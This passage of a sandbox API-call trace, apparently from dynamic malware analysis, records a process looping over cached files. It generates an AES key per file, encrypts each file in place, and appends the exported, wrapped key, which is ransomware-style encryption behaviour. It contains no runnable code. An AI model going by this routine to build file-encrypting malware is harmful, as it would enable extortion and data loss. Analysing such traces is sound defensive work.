dwSize=0x0, dwFreeType=0x8000) returned 1 [0145.085] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0145.085] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0145.085] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8E4E510F44A56B8C8ECFEC352907C373_411140098D71F028134E9B8A21255C61", dwFileAttributes=0x80) returned 1 [0145.086] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8E4E510F44A56B8C8ECFEC352907C373_411140098D71F028134E9B8A21255C61" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\8e4e510f44a56b8c8ecfec352907c373_411140098d71f028134e9b8a21255c61"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x198 [0145.086] GetFileSizeEx (in: hFile=0x198, lpFileSize=0x29ab128 | out: lpFileSize=0x29ab128*=1437) returned 1 [0145.086] GetFileSizeEx (in: hFile=0x198, lpFileSize=0x29ab138 | out: lpFileSize=0x29ab138*=1437) returned 1 [0145.086] SetFilePointerEx (in: hFile=0x198, liDistanceToMove=0x47b, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0145.086] ReadFile (in: hFile=0x198, lpBuffer=0x29ab188, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29ab148, lpOverlapped=0x0 | out: lpBuffer=0x29ab188*, lpNumberOfBytesRead=0x29ab148*=0x19, lpOverlapped=0x0) returned 1 [0145.087] SetFilePointer (in: hFile=0x198, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0145.087] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29ab110 | out: phKey=0x29ab110*=0x3b8690) returned 1 [0145.087] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0145.087] SetFilePointer (in: hFile=0x198, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0145.087] ReadFile (in: hFile=0x198, lpBuffer=0x2760000, nNumberOfBytesToRead=0x59d, lpNumberOfBytesRead=0x29ab120, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29ab120*=0x59d, lpOverlapped=0x0) returned 1 [0145.087] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ab11c*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29ab11c*=0xf4250) returned 1 [0145.087] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29ab118*=0x59d, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29ab118*=0x5a0) returned 1 [0145.087] SetFilePointer (in: hFile=0x198, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0145.087] WriteFile (in: hFile=0x198, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x5a0, lpNumberOfBytesWritten=0x29ab120, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29ab120*=0x5a0, lpOverlapped=0x0) returned 1 [0145.087] WriteFile (in: hFile=0x198, lpBuffer=0x29ab160*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29ab124, lpOverlapped=0x0 | out: lpBuffer=0x29ab160*, lpNumberOfBytesWritten=0x29ab124*=0x6, lpOverlapped=0x0) returned 1 [0145.088] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29ab130 | out: pbData=0x0*, pdwDataLen=0x29ab130*=0x10c) returned 1 [0145.088] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ab1b0, pdwDataLen=0x29ab130 | out: pbData=0x29ab1b0*, pdwDataLen=0x29ab130*=0x10c) returned 1 [0145.088] WriteFile (in: hFile=0x198, lpBuffer=0x29ab1b0*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29ab124, lpOverlapped=0x0 | out: lpBuffer=0x29ab1b0*, lpNumberOfBytesWritten=0x29ab124*=0x10c, lpOverlapped=0x0) returned 1 [0145.088] CloseHandle (hObject=0x198) returned 1 [0145.114] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0145.118] CryptDestroyKey (hKey=0x3b8690) returned 1 [0145.118] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0145.119] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0145.119] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0145.119] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\94308059B57B3142E455B38A6EB92015", dwFileAttributes=0x80) returned 1 [0145.122] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\94308059B57B3142E455B38A6EB92015" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\94308059b57b3142e455b38a6eb92015"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x198 [0145.122] GetFileSizeEx (in: hFile=0x198, lpFileSize=0x29ab128 | out: lpFileSize=0x29ab128*=53978) returned 1 [0145.122] GetFileSizeEx (in: hFile=0x198, lpFileSize=0x29ab138 | out: lpFileSize=0x29ab138*=53978) returned 1 [0145.122] SetFilePointerEx (in: hFile=0x198, liDistanceToMove=0xd1b8, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0145.122] ReadFile (in: hFile=0x198, lpBuffer=0x29ab188, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29ab148, lpOverlapped=0x0 | out: lpBuffer=0x29ab188*, lpNumberOfBytesRead=0x29ab148*=0x19, lpOverlapped=0x0) returned 1 [0145.123] SetFilePointer (in: hFile=0x198, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0145.123] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29ab110 | out: phKey=0x29ab110*=0x3b8690) returned 1 [0145.123] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0145.124] SetFilePointer (in: hFile=0x198, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0145.124] ReadFile (in: hFile=0x198, lpBuffer=0x2760000, nNumberOfBytesToRead=0xd2da, lpNumberOfBytesRead=0x29ab120, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29ab120*=0xd2da, lpOverlapped=0x0) returned 1 [0145.125] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ab11c*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29ab11c*=0xf4250) returned 1 [0145.125] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29ab118*=0xd2da, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29ab118*=0xd2e0) returned 1 [0145.125] SetFilePointer (in: hFile=0x198, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0145.125] WriteFile (in: hFile=0x198, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0xd2e0, lpNumberOfBytesWritten=0x29ab120, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29ab120*=0xd2e0, lpOverlapped=0x0) returned 1 [0145.125] WriteFile (in: hFile=0x198, lpBuffer=0x29ab160*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29ab124, lpOverlapped=0x0 | out: lpBuffer=0x29ab160*, lpNumberOfBytesWritten=0x29ab124*=0x6, lpOverlapped=0x0) returned 1 [0145.125] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29ab130 | out: pbData=0x0*, pdwDataLen=0x29ab130*=0x10c) returned 1 [0145.125] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ab1b0, pdwDataLen=0x29ab130 | out: pbData=0x29ab1b0*, pdwDataLen=0x29ab130*=0x10c) returned 1 [0145.126] WriteFile (in: hFile=0x198, lpBuffer=0x29ab1b0*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29ab124, lpOverlapped=0x0 | out: lpBuffer=0x29ab1b0*, lpNumberOfBytesWritten=0x29ab124*=0x10c, lpOverlapped=0x0) returned 1 [0145.126] CloseHandle (hObject=0x198) returned 1 [0145.142] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0145.146] CryptDestroyKey (hKey=0x3b8690) returned 1 [0145.146] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0145.146] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0145.146] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0145.146] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\955CAB6FF6A24D5820D50B5BA1CF79C7_AD9E7615297A3A83320AACE5801A04F9", dwFileAttributes=0x80) returned 1 [0145.147] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\955CAB6FF6A24D5820D50B5BA1CF79C7_AD9E7615297A3A83320AACE5801A04F9" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\955cab6ff6a24d5820d50b5ba1cf79c7_ad9e7615297a3a83320aace5801a04f9"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x198 [0145.147] GetFileSizeEx (in: hFile=0x198, lpFileSize=0x29ab128 | out: lpFileSize=0x29ab128*=1504) returned 1 [0145.147] GetFileSizeEx (in: hFile=0x198, lpFileSize=0x29ab138 | out: lpFileSize=0x29ab138*=1504) returned 1 [0145.147] SetFilePointerEx (in: hFile=0x198, liDistanceToMove=0x4be, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0145.147] ReadFile (in: hFile=0x198, lpBuffer=0x29ab188, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29ab148, lpOverlapped=0x0 | out: lpBuffer=0x29ab188*, lpNumberOfBytesRead=0x29ab148*=0x19, lpOverlapped=0x0) returned 1 [0145.149] SetFilePointer (in: hFile=0x198, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0145.149] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29ab110 | out: phKey=0x29ab110*=0x3b8690) returned 1 [0145.149] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0145.149] SetFilePointer (in: hFile=0x198, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0145.149] ReadFile (in: hFile=0x198, lpBuffer=0x2760000, nNumberOfBytesToRead=0x5e0, lpNumberOfBytesRead=0x29ab120, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29ab120*=0x5e0, lpOverlapped=0x0) returned 1 [0145.149] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ab11c*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29ab11c*=0xf4250) returned 1 [0145.149] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29ab118*=0x5e0, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29ab118*=0x5f0) returned 1 [0145.149] SetFilePointer (in: hFile=0x198, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0145.149] WriteFile (in: hFile=0x198, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x5f0, lpNumberOfBytesWritten=0x29ab120, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29ab120*=0x5f0, lpOverlapped=0x0) returned 1 [0145.149] WriteFile (in: hFile=0x198, lpBuffer=0x29ab160*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29ab124, lpOverlapped=0x0 | out: lpBuffer=0x29ab160*, lpNumberOfBytesWritten=0x29ab124*=0x6, lpOverlapped=0x0) returned 1 [0145.149] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29ab130 | out: pbData=0x0*, pdwDataLen=0x29ab130*=0x10c) returned 1 [0145.149] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ab1b0, pdwDataLen=0x29ab130 | out: pbData=0x29ab1b0*, pdwDataLen=0x29ab130*=0x10c) returned 1 [0145.149] WriteFile (in: hFile=0x198, lpBuffer=0x29ab1b0*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29ab124, lpOverlapped=0x0 | out: lpBuffer=0x29ab1b0*, lpNumberOfBytesWritten=0x29ab124*=0x10c, lpOverlapped=0x0) returned 1 [0145.149] CloseHandle (hObject=0x198) returned 1 [0145.176] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0145.180] CryptDestroyKey (hKey=0x3b8690) returned 1 [0145.180] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0145.180] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0145.180] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0145.181] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\9BC2FFC5D9591E1BD3545230E9B7CC36_CF30943571F9BEE96C487B2D9F0436E6", dwFileAttributes=0x80) returned 1 [0145.191] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\9BC2FFC5D9591E1BD3545230E9B7CC36_CF30943571F9BEE96C487B2D9F0436E6" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\9bc2ffc5d9591e1bd3545230e9b7cc36_cf30943571f9bee96c487b2d9f0436e6"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x198 [0145.191] GetFileSizeEx (in: hFile=0x198, lpFileSize=0x29ab128 | out: lpFileSize=0x29ab128*=1451) returned 1 [0145.191] GetFileSizeEx (in: hFile=0x198, lpFileSize=0x29ab138 | out: lpFileSize=0x29ab138*=1451) returned 1 [0145.191] SetFilePointerEx (in: hFile=0x198, liDistanceToMove=0x489, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0145.191] ReadFile (in: hFile=0x198, lpBuffer=0x29ab188, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29ab148, lpOverlapped=0x0 | out: lpBuffer=0x29ab188*, lpNumberOfBytesRead=0x29ab148*=0x19, lpOverlapped=0x0) returned 1 [0145.193] SetFilePointer (in: hFile=0x198, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0145.193] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29ab110 | out: phKey=0x29ab110*=0x3b8690) returned 1 [0145.193] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0145.193] SetFilePointer (in: hFile=0x198, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0145.193] ReadFile (in: hFile=0x198, lpBuffer=0x2760000, nNumberOfBytesToRead=0x5ab, lpNumberOfBytesRead=0x29ab120, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29ab120*=0x5ab, lpOverlapped=0x0) returned 1 [0145.193] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ab11c*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29ab11c*=0xf4250) returned 1 [0145.193] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29ab118*=0x5ab, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29ab118*=0x5b0) returned 1 [0145.193] SetFilePointer (in: hFile=0x198, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0145.193] WriteFile (in: hFile=0x198, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x5b0, lpNumberOfBytesWritten=0x29ab120, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29ab120*=0x5b0, lpOverlapped=0x0) returned 1 [0145.193] WriteFile (in: hFile=0x198, lpBuffer=0x29ab160*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29ab124, lpOverlapped=0x0 | out: lpBuffer=0x29ab160*, lpNumberOfBytesWritten=0x29ab124*=0x6, lpOverlapped=0x0) returned 1 [0145.193] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29ab130 | out: pbData=0x0*, pdwDataLen=0x29ab130*=0x10c) returned 1 [0145.193] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ab1b0, pdwDataLen=0x29ab130 | out: pbData=0x29ab1b0*, pdwDataLen=0x29ab130*=0x10c) returned 1 [0145.193] WriteFile (in: hFile=0x198, lpBuffer=0x29ab1b0*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29ab124, lpOverlapped=0x0 | out: lpBuffer=0x29ab1b0*, lpNumberOfBytesWritten=0x29ab124*=0x10c, lpOverlapped=0x0) returned 1 [0145.193] CloseHandle (hObject=0x198) returned 1 [0145.210] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0145.214] CryptDestroyKey (hKey=0x3b8690) returned 1 [0145.214] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0145.214] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0145.214] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0145.214] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\9C888BEABCCBC2A97B0D6D9214C3BA37_1213DC6F71E4C3B05E7BCEEBC203A31E", dwFileAttributes=0x80) returned 1 [0145.222] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\9C888BEABCCBC2A97B0D6D9214C3BA37_1213DC6F71E4C3B05E7BCEEBC203A31E" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\9c888beabccbc2a97b0d6d9214c3ba37_1213dc6f71e4c3b05e7bceebc203a31e"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x198 [0145.222] GetFileSizeEx (in: hFile=0x198, lpFileSize=0x29ab128 | out: lpFileSize=0x29ab128*=1618) returned 1 [0145.222] GetFileSizeEx (in: hFile=0x198, lpFileSize=0x29ab138 | out: lpFileSize=0x29ab138*=1618) returned 1 [0145.222] SetFilePointerEx (in: hFile=0x198, liDistanceToMove=0x530, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0145.222] ReadFile (in: hFile=0x198, lpBuffer=0x29ab188, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29ab148, lpOverlapped=0x0 | out: lpBuffer=0x29ab188*, lpNumberOfBytesRead=0x29ab148*=0x19, lpOverlapped=0x0) returned 1 [0145.223] SetFilePointer (in: hFile=0x198, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0145.223] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29ab110 | out: phKey=0x29ab110*=0x3b8690) returned 1 [0145.223] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0145.224] SetFilePointer (in: hFile=0x198, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0145.224] ReadFile (in: hFile=0x198, lpBuffer=0x2760000, nNumberOfBytesToRead=0x652, lpNumberOfBytesRead=0x29ab120, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29ab120*=0x652, lpOverlapped=0x0) returned 1 [0145.224] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ab11c*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29ab11c*=0xf4250) returned 1 [0145.224] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29ab118*=0x652, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29ab118*=0x660) returned 1 [0145.224] SetFilePointer (in: hFile=0x198, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0145.224] WriteFile (in: hFile=0x198, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x660, lpNumberOfBytesWritten=0x29ab120, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29ab120*=0x660, lpOverlapped=0x0) returned 1 [0145.224] WriteFile (in: hFile=0x198, lpBuffer=0x29ab160*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29ab124, lpOverlapped=0x0 | out: lpBuffer=0x29ab160*, lpNumberOfBytesWritten=0x29ab124*=0x6, lpOverlapped=0x0) returned 1 [0145.224] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29ab130 | out: pbData=0x0*, pdwDataLen=0x29ab130*=0x10c) returned 1 [0145.224] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ab1b0, pdwDataLen=0x29ab130 | out: pbData=0x29ab1b0*, pdwDataLen=0x29ab130*=0x10c) returned 1 [0145.224] WriteFile (in: hFile=0x198, lpBuffer=0x29ab1b0*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29ab124, lpOverlapped=0x0 | out: lpBuffer=0x29ab1b0*, lpNumberOfBytesWritten=0x29ab124*=0x10c, lpOverlapped=0x0) returned 1 [0145.224] CloseHandle (hObject=0x198) returned 1 [0145.244] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0145.248] CryptDestroyKey (hKey=0x3b8690) returned 1 [0145.248] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0145.248] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0145.248] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0145.248] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\9C888BEABCCBC2A97B0D6D9214C3BA37_EBC75728C6119A77E4DA8559DD10F061", dwFileAttributes=0x80) returned 1 [0145.249] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\9C888BEABCCBC2A97B0D6D9214C3BA37_EBC75728C6119A77E4DA8559DD10F061" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\9c888beabccbc2a97b0d6d9214c3ba37_ebc75728c6119a77e4da8559dd10f061"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x198 [0145.249] GetFileSizeEx (in: hFile=0x198, lpFileSize=0x29ab128 | out: lpFileSize=0x29ab128*=1618) returned 1 [0145.249] GetFileSizeEx (in: hFile=0x198, lpFileSize=0x29ab138 | out: lpFileSize=0x29ab138*=1618) returned 1 [0145.249] SetFilePointerEx (in: hFile=0x198, liDistanceToMove=0x530, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0145.249] ReadFile (in: hFile=0x198, lpBuffer=0x29ab188, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29ab148, lpOverlapped=0x0 | out: lpBuffer=0x29ab188*, lpNumberOfBytesRead=0x29ab148*=0x19, lpOverlapped=0x0) returned 1 [0145.255] SetFilePointer (in: hFile=0x198, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0145.255] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29ab110 | out: phKey=0x29ab110*=0x3b8690) returned 1 [0145.255] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0145.255] SetFilePointer (in: hFile=0x198, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0145.255] ReadFile (in: hFile=0x198, lpBuffer=0x2760000, nNumberOfBytesToRead=0x652, lpNumberOfBytesRead=0x29ab120, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29ab120*=0x652, lpOverlapped=0x0) returned 1 [0145.255] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ab11c*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29ab11c*=0xf4250) returned 1 